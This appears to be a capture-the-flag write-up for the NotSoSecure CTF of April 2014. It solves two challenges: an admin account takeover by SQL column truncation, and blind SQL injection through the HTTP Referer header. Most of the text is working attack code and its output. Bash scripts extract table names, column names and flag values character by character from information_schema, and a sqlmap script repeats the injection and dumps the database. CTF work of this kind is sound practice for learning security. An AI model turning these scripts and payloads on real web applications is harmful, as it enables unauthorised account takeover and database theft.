# NotSoSecure CTF April 2k14


Flag 1 - Column truncation

# cat get_register_page
#!/bin/bash

url='http://ctf.notsosecure.com/9128938921839838/'

comment=`curl --silent --location --request GET $url | grep -e '<!--' | tail -n 1 | awk -F '-' '{print $3}' | tr -d ' '`
echo $comment
echo $comment | base64 -d | gunzip ; echo

# ./get_register_page 
H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA
R3gi5t3r.html

# cat get_flag_1
#!/bin/bash

regname="`echo -n \"$1\" | sed 's/ /%20/g'`"
regemail="$2"
regpass="$3"
url='http://ctf.notsosecure.com/9128938921839838'
register_url="$url/register.php?regname=$regname&regemail=$regemail&regpass1=$regpass&regpass2=$regpass"
cookie="nss"

curl --silent --request GET $register_url | grep -e 'successfully' -e 'Already'

checklogin_url="$url/checklogin.php"                                             
curl --silent --location --request POST --cookie-jar $cookie --cookie $cookie --data "myusername=admin&mypassword=$regpass" $checklogin_url | grep -e 'Flag' -e 'feedback'

# ./get_flag_1 'admin               nss' 'fake@mail.com' 's3cur3'
              <h3 style="text-align: center;font-size: 30px;">You have registered successfully</h3>
       <h4 style="text-align: center;">Well done, 1st Flag is 67326289</h4>
      <center><a href="f33db4ck_flag/index.php" class="btn">feedback</a></center>

Flag 2 - Blind SQLi in HTTP Referer

# cat get_flag_2
#!/bin/bash

./feedback_base

echo "=== Dump tables ==="
./dump_tables

echo "=== Dump columns from flag table ==="
./dump_columns flag

echo "=== Dump flags from flag column ==="
./dump_flags flag flag

# cat feedback_base
#!/bin/bash

ofile="normal"
name="name"
email="email"
message="message"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

curl --silent --request POST --data "name=$name&email=$email&message=$message&submit=Submit" $feedback_url > $ofile

# cat dump_tables
#!/bin/bash

t=0
while true; do
    error=`./feedback "(select count(distinct table_name) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql')=$t" | grep Error`
    if [ "$error" != "" ]; then
        t=$[$t+1]
    else
        break
    fi
done

echo "#tables = $t"

for i in `seq 0 $[$t-1]`; do
    echo -n "table[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length(table_name) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring(table_name,$k,1) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# cat dump_columns 
#!/bin/bash

table="$1"
c=0
while true; do
    error=`./feedback "(select count(distinct column_name) from information_schema.columns where table_name='$table')=$c" | grep Error`
    if [ "$error" != "" ]; then
        c=$[$c+1]
    else
        break
    fi
done

echo "table = $table"
echo "#columns = $c"

for i in `seq 0 $[$c-1]`; do
    echo -n "column[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length(column_name) from information_schema.columns where table_name='$table' limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring(column_name,$k,1) from information_schema.columns where table_name='$table' limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# cat dump_flags 
#!/bin/bash

table="$1"
column="$2"
f=0
while true; do
    error=`./feedback "(select count(distinct $column) from $table)=$f" | grep Error`
    if [ "$error" != "" ]; then
        f=$[$f+1]
    else
        break
    fi
done

echo "table = $table"
echo "column = $table"
echo "#flags = $f"

for i in `seq 0 $[$f-1]`; do
    echo -n "flag[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length($column) from $table limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring($column,$k,1) from $table limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# ./cat feedback
#!/bin/bash

function compare {
    grep Thanks $ofile
    diff normal $ofile
    rm $ofile
}

function encode {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}

ofile="$RANDOM"
name="name"
email="email"
message="message"
condition="$1"
injection="'+(select if($condition,'1',(select table_name from information_schema.columns limit 1,2)))+'"
referer="`encode "$injection"`"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

#--proxy 127.0.0.1:8080
curl --silent --referer "$referer" --request POST --data "name=$name&email=$email&message=$message&submit=Submit" $feedback_url > $ofile
compare

# ./get_flag_2
=== Dump tables ===
#tables = 2
table[0] = flag
table[1] = temp
=== Dump columns from flag table ===
table = flag
#columns = 1
column[0] = flag
=== Dump flags from flag column ===
table = flag
column = flag
#flags = 1
flag[0] = 1362390

Flag 2 - Blind SQLi in HTTP Referer (sqlmap)

# cat do_sqlmap 
#!/bin/bash

function sqlm {
    args="$1"
    echo "$args"
    url='http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
    referer='%27||(select(1)regexp(IF(1=1*,1,%27%27)))||%27'
    string='Thanks!, we will be in touch...'
    sqlmap \
        --url="$url" \
        --referer="$referer" \
        --string="$string" \
        --technique=B \
        --threads=4 \
        --answers='it?=Y,any)?=y' \
        $args
}

echo "=== Fingerprint ==="
sqlm
echo "=== Enumerate DBMS databases ==="
sqlm "--dbms=MySQL --dbs"
echo "=== Enumerate DBMS database tables ==="
sqlm "--dbms=MySQL -D seven --tables"
echo "=== Enumerate DBMS database table columns ==="
sqlm "--dbms=MySQL -D seven -T flag --columns"
echo "=== Dump DBMS database table entries ==="
sqlm "--dbms=MySQL -D seven -T flag -C flag --dump"

# ./do_sqlmap
=== Fingerprint ===

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Referer #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(select(1)regexp(IF(1=1 AND 4549=4549,1,'')))||'
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0

=== Enumerate DBMS databases ===
--dbms=MySQL --dbs

available databases [2]:
[*] information_schema
[*] seven

=== Enumerate DBMS database tables ===
--dbms=MySQL -D seven --tables

Database: seven
[2 tables]
+------+
| flag |
| temp |
+------+

=== Enumerate DBMS database table columns ===
--dbms=MySQL -D seven -T flag --columns

Database: seven
Table: flag
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(20) |
+--------+-------------+

=== Dump DBMS database table entries ===
--dbms=MySQL -D seven -T flag -C flag --dump

Database: seven
Table: flag
[1 entry]
+---------+
| flag    |
+---------+
| 1362390 |
+---------+

No comments: